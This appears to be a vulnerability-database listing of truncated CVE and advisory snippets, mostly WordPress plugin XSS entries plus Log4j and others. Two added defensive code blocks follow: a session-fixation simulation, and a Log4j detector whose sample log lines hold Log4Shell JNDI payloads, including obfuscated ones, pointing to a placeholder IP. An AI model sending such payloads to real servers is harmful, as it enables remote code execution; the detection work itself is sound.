The Huawei ViewPoint VP9610 and VP9620 units for the Huawei Video Conference system do not update the Session ID upon successful establishment of a login session, which allows remote authenticated users to hijack sessions via an unspecified interception...
6.4 AI Score | 0.002 EPSS
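The bug class in this entry is session fixation: a session identifier issued before authentication stays valid after it, so anyone who already holds that identifier owns the logged-in session. The following is an added illustration written for this page, not Huawei's code and not a description of the ViewPoint firmware; the in-memory session store, the two login handlers and the simulated attack are all constructed here. How the attacker gets the victim to use a known identifier is left out, as the advisory itself leaves it unspecified.

```python
import secrets


class SessionStore:
    """Constructed in-memory session store standing in for a device session table."""

    def __init__(self):
        self._sessions = {}  # session id -> session data

    def new(self):
        """Issue a fresh, unauthenticated session and return its id."""
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": None}
        return sid

    def get(self, sid):
        return self._sessions.get(sid)

    def destroy(self, sid):
        self._sessions.pop(sid, None)


def login_vulnerable(store, sid, user):
    """Authenticates the caller but keeps the pre-login session id (the pattern in the
    listing). Whoever already knows `sid` now owns an authenticated session."""
    sess = store.get(sid)
    if sess is None:
        sid = store.new()
        sess = store.get(sid)
    sess["user"] = user
    return sid


def login_fixed(store, sid, user):
    """Authenticates and rotates the session id; the pre-login id is invalidated."""
    store.destroy(sid)
    new_sid = store.new()
    store.get(new_sid)["user"] = user
    return new_sid


def fixation_attack(login):
    """Simulated fixation: the attacker obtains a valid id, the victim logs in with it,
    and the attacker presents the same id afterwards. Returns the user the attacker's
    id now resolves to (None means the hijack failed)."""
    store = SessionStore()
    attacker_sid = store.new()
    # The attacker plants attacker_sid in the victim's client (URL, cookie, interception);
    # the mechanism is out of scope here, as it is in the advisory.
    login(store, attacker_sid, "alice")
    sess = store.get(attacker_sid)
    return sess["user"] if sess else None


if __name__ == "__main__":
    print("vulnerable:", fixation_attack(login_vulnerable))  # alice
    print("fixed:     ", fixation_attack(login_fixed))       # None
```

The check a reviewer wants is the one `login_fixed` makes explicit: destroy the old id, mint a new one, and only then attach the identity. Regenerating on privilege change (login, role elevation) is the rule; reusing the pre-authentication id is the finding.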
Integrating Live Patching in SecDevOps Workflows
SecDevOps is, just like DevOps, a transformational change that organizations undergo at some point during their lifetime. Just like many other big changes, SecDevOps is commonly adopted after a reality check of some kind: a big damaging cybersecurity incident, for example. A major security breach...
-0.3 AI Score
Adobe Acrobat Reader DC overlapping annotations type confusion vulnerability
Summary A type confusion vulnerability exists in the way Adobe Acrobat Reader DC 2022.001.20085 deals with overlapping annotations. A specially-crafted PDF document can trigger this vulnerability, which can lead to arbitrary code execution. A victim needs to open the malicious file to trigger this....
7.8 CVSS | 0.1 AI Score | 0.001 EPSS
Dynamic analysis of firmware components in IoT devices
Among the various offensive security techniques, vulnerability assessment takes priority when it comes to analyzing the security of IoT/IIoT devices. In most cases, such devices are analyzed using the black box testing approach, in which the researcher has virtually no knowledge about the object...
-0.6 AI Score
An issue was discovered in libmatio.a in matio (aka MAT File I/O Library) 1.5.13. There is a stack-based buffer over-read in Mat_VarReadNextInfo5() in...
9.1 CVSS | 2.9 AI Score | 0.006 EPSS
Cyber Security WEBINAR — How to Ace Your InfoSec Board Deck
Communication is a vital skill for any leader at an organization, regardless of seniority. For security leaders, this goes double. Communicating clearly works on multiple levels. On the one hand, security leaders and CISOs must be able to communicate strategies clearly – instructions, incident...
What is threat modeling ❓ Definition, Methods, Example
Threat modeling is a method for improving the security of an application, system, or business process by identifying objectives and vulnerabilities, and then implementing countermeasures to prevent or mitigate the effects of threats to the system. Threat modeling helps identify the security...
-0.2 AI Score
Introduction Are you an organization that manages or hosts a large pool of resources on remote locations/servers? Host-based authentication is a well-suited way to manage the access and control rights related to your hardware and applications. Once implemented, this identity...
-0.3 AI Score
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8 CVSS | 9.6 AI Score | 0.005 EPSS
Zoho ManageEngine ServiceDesk Plus before 12003 allows authentication bypass in certain admin...
9.8 CVSS | 9.5 AI Score | 0.005 EPSS
It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context...
Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message....
KLA12390 RCE vulnerability in Apache Log4j
Remote code execution vulnerability was found in Apache Log4j. Malicious users can exploit this vulnerability to execute arbitrary code. Original advisories Apache Log4j Security Vulnerabilities Exploitation Public exploits exist for this vulnerability. Malware exists for this vulnerability....
10 CVSS | 10 AI Score | 0.976 EPSS
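The three Log4j entries above describe the same primitive from two angles: a `${jndi:...}` lookup reaching a logged field (CVE-2021-44228), and, after 2.15.0, other lookups such as `${ctx:...}` in Thread Context Map data still being evaluated in non-default layouts. What a responder wants is a detector that sees through the common obfuscations before matching. The block below is an added example written for this page, not code from Apache, Kaspersky or any of the listed advisories; the sample log lines are constructed (documentation IP ranges, no real capture), and the obfuscation rules cover only the `${lower:}`/`${upper:}` and `${...:-default}` forms plus URL encoding.

```python
import re
from urllib.parse import unquote

# ${lower:j}/${upper:j} and default-value lookups such as ${::-j} or ${x:-j} are
# the usual ways "jndi" is hidden from naive string matching; both resolve to text.
_CASE = re.compile(r'\$\{(lower|upper):([^${}]*)\}', re.IGNORECASE)
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(ldaps|ldap|rmi|dns|iiop|corba|nds|http)',
                   re.IGNORECASE)
_LOOKUP = re.compile(r'\$\{\s*([A-Za-z]+)\s*:')


def normalize(text, rounds=8):
    """URL-decode and collapse nested obfuscation, innermost first, until stable."""
    for _ in range(rounds):
        new = unquote(text)
        new = _CASE.sub(lambda m: m.group(2).lower() if m.group(1).lower() == "lower"
                        else m.group(2).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def findings(line):
    """Tags for one log line: 'jndi:<scheme>' for a JNDI lookup, 'lookup:<prefix>'
    for any other Log4j lookup that arrived in a field fed from untrusted input."""
    norm = normalize(line)
    tags = []
    m = _JNDI.search(norm)
    if m:
        tags.append("jndi:" + m.group(1).lower())
    for prefix in _LOOKUP.findall(norm):
        tag = "lookup:" + prefix.lower()
        if prefix.lower() != "jndi" and tag not in tags:
            tags.append(tag)
    return tags


def scan(lines):
    """(index, tags) for every line that carries at least one finding."""
    return [(i, tags) for i, line in enumerate(lines) if (tags := findings(line))]


# Constructed sample lines (documentation IP ranges; nothing here is a real capture).
SAMPLE_LOG = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" '
    '"${${lower:j}${upper:n}di:${lower:rmi}://198.51.100.7/x}"',
    '10.0.0.9 - - "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fb%7D '
    'HTTP/1.1" 404',
    'user=${ctx:loginId} msg=hello',
]

if __name__ == "__main__":
    for i, tags in scan(SAMPLE_LOG):
        print(f"line {i}: {', '.join(tags)}")
```

The non-JNDI `lookup:` tag is deliberately noisy: after the incomplete 2.15.0 fix, any `${...:...}` lookup syntax arriving from outside is worth a look, not only the `jndi` prefix. The detector is a triage aid, not a substitute for upgrading or removing the JndiLookup class.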
A closer look at Qakbot’s latest building blocks (and how to knock them down)
Multiple Qakbot campaigns that are active at any given time prove that the decade-old malware continues to be many attackers’ tool of choice, a customizable chameleon that adapts to suit the needs of the multiple threat actor groups that utilize it. Since emerging in 2007 as a banking Trojan,...
Not with a Bang but a Whisper: The Shift to Stealthy C2
As defensive tools have evolved to detect more and more traditional attack techniques, it should come as no surprise that attackers have shifted tactics. This ever-evolving arms race between offensive security toolsets, bespoke advanced persistent threat (APT) malware and the billion-dollar...
-0.5 AI Score
The cost of data security – it’s not just about the numbers
Organizations striving to improve their security posture often find this a multi-faceted challenge. In addition to the security product evaluation itself, security budgets are tight and justification is a necessary step. Financial language, however, is not everyone’s forte - and fiscal...
0.5 AI Score
Exploit for Deserialization of Untrusted Data in Solarwinds Orion Platform
CVE-2021-35215 SolarWinds Orion Platform ActionPluginBaseView...
8.9 CVSS | 8.9 AI Score | 0.121 EPSS
Many people know about red teams ‒ ethical hackers who test an organization's security defenses by launching attacks in a controlled environment. Red teams are opposed by blue teams, who are tasked with assessing an organization's security readiness, preventing red...
-0.4 AI Score
A3: Sensitive Data Exposure ❗️ — Top 10 OWASP 2017
Introduction I feel like a lot of mystery surrounds this issue from the top 10 OWASP vulnerabilities. A lot of people seem to wonder which data is sensitive when exposed. Some people seem to think every single API key disclosed in a JS file is a...
7.5 CVSS | 7.7 AI Score | 0.001 EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1 CVSS | 6 AI Score | 0.002 EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1 CVSS | 0.002 EPSS
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.1 CVSS | 6.1 AI Score | 0.002 EPSS
CVE-2021-24435 Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting...
6.3 AI Score | 0.002 EPSS
Watch what you send on anonymous SMS websites
It's a good idea to try and keep certain things private. For example, people have been using anonymous email services for years. These either hide your real email address, or replace it entirely for specific tasks. Folks will go one step further, setting aliases for each service they sign up to....
-0.5 AI Score
WordPress Woosaleskit Bar plugin <= 1.0.0 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Woosaleskit Bar plugin (versions <= 1.0.0). Solution This plugin has been closed as of May 2, 2019 and is not available for download. Reason: Guideline...
3.1 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Events Shortcodes & Templates For The Events Calendar plugin (versions <= 1.7.1). Solution Update the WordPress Events Shortcodes & Templates For The Events Calendar plugin to the latest...
2 AI Score
WordPress Venture Event Manager plugin <= 3.2.4 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Venture Event Manager plugin (versions <= 3.2.4). Solution Update the WordPress Venture Event Manager plugin to the latest available version (at least...
2.1 AI Score
WordPress BetterOptin plugin <= 2.0.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress BetterOptin plugin (versions <= 2.0.2). Solution This plugin has been closed and is no longer available for...
3.1 AI Score
WordPress WP Mobile Menu plugin <= 2.8.2.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress WP Mobile Menu plugin (versions <= 2.8.2.2). Solution Update the WordPress WP Mobile Menu plugin to the latest available version (at least...
2 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Total Sales For Woocommerce plugin (versions <= 1.1). Solution 2021-08-27 - no patched version...
2.1 AI Score
WordPress Awesome Support plugin <= 6.0.8 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Awesome Support plugin (versions <= 6.0.8). Solution Update the WordPress Awesome Support plugin to the latest available version (at least...
2.1 AI Score
WordPress Icons with Links Widget plugin <= 1.2 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Icons with Links Widget plugin (versions <= 1.2). Solution This plugin has been closed as of July 5, 2021 and is not available for download. This closure is temporary, pending a full...
2.6 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Request Quote via Whatsapp for Woocommerce plugin (versions <= 1.0.1). Solution This plugin has been closed as of September 25, 2019 and is not available for...
3.9 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex in WordPress 4k Icons for Visual Composer plugin (versions <= 1.0). Solution This plugin has been closed and is no longer available for...
6.1 CVSS | 3.1 AI Score | 0.002 EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Ad Blocker Notify Lite plugin (versions <= 2.4.0). Solution 2021-08-25 - no patched version is available. Deactivate and...
2.5 AI Score
Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues Edit (WPScanTeam): - The original report mentioned the issue in the...
6.1 CVSS | 0.1 AI Score | 0.002 EPSS
WordPress Border Loading Bar plugin <= 1.0.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Border Loading Bar plugin (versions <= 1.0.1). Solution This plugin has been closed as of September 7, 2021 and is not available for download. This closure is temporary, pending a full...
2.5 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Facebook Page Feed Timeline plugin (versions <= 1.0). Solution This plugin has been closed as of July 15, 2019 and is not available for download. This closure is permanent. Reason: Author...
2 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Product Limited Time Availability Date for WooCommerce plugin (versions <= 1.0.1). Solution 2021-08-27 - no patched version...
1.9 AI Score
WordPress AMP extensions plugin <= 1.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress AMP extensions plugin (versions <= 1.1). Solution 2021-08-25 - no patched version is available. Deactivate and...
2.4 AI Score
Titan Framework <= 1.12.1 - Reflected Cross-Site Scripting (XSS)
The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues Edit (WPScanTeam): - The original report mentioned the issue in the...
6.1 CVSS | 0.5 AI Score | 0.002 EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex in WordPress Disable Image Right Click plugin (versions <= 1.0). Solution Deactivate and delete. This plugin has been closed as of January 6, 2022 and is not available for download. This closure is temporary, pending a full...
6.1 CVSS | 1.7 AI Score | 0.002 EPSS
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress W3SCloud Contact Form 7 to Zoho CRM plugin (versions <= 1.1.0). Solution Update the WordPress W3SCloud Contact Form 7 to Zoho CRM plugin to the latest available version (at least...
2 AI Score
WordPress Stars Menu plugin <= 1.0.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Stars Menu plugin (versions <= 1.0.1). Solution 2021-08-27 - no patched version...
2.2 AI Score
WordPress Кнопка Яндекс Денег plugin <= 2.3.3 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Кнопка Яндекс Денег plugin (versions <= 2.3.3). Solution Update the WordPress Кнопка Яндекс Денег plugin to the latest available version (at least...
1.6 AI Score
WordPress Affiliate PRO plugin <= 1.3.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Affiliate PRO plugin (versions <= 1.3.1). Solution This plugin has been closed and is no longer available for...
3.9 AI Score
WordPress tcS3 plugin <= 2.1.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress tcS3 plugin (versions <= 2.1.1). Solution 2021-08-27 - no patched version...
2.1 AI Score
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress TR Easy Google Analytics plugin (versions <= 1.0.0). Solution This plugin has been closed as of October 23, 2018 and is not available for download. Reason: Guideline...
3.1 AI Score
WordPress Titan Framework plugin <= 1.12.1 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by iohex and WPScanTeam in WordPress Titan Framework plugin (versions <= 1.12.1). Solution This plugin has been closed as of March 16, 2021 and is not available for download. This closure is permanent. Reason: Author...
6.1 CVSS | 2.7 AI Score | 0.002 EPSS